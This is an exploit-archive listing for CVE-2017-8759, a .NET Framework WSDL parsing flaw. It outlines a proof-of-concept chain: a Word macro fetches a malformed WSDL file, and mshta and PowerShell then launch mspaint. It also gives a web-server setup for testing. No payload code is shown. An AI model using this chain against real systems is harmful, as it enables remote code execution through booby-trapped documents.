Microsoft Windows .NET Framework - Remote Code Execution 0day Exploit

2017-10-13
ID: 94468
CVE: None
Download vulnerable application: None
Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
  Running CVE-2017-8759 exploit sample.
  Flow of the exploit:
  Word macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe which in turn runs a powershell commands that runs mspaint.exe
  To test:
  Run a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. For example python -m SimpleHTTPServer 8080
  If all is good mspaint should run.
1-4-2 (www02)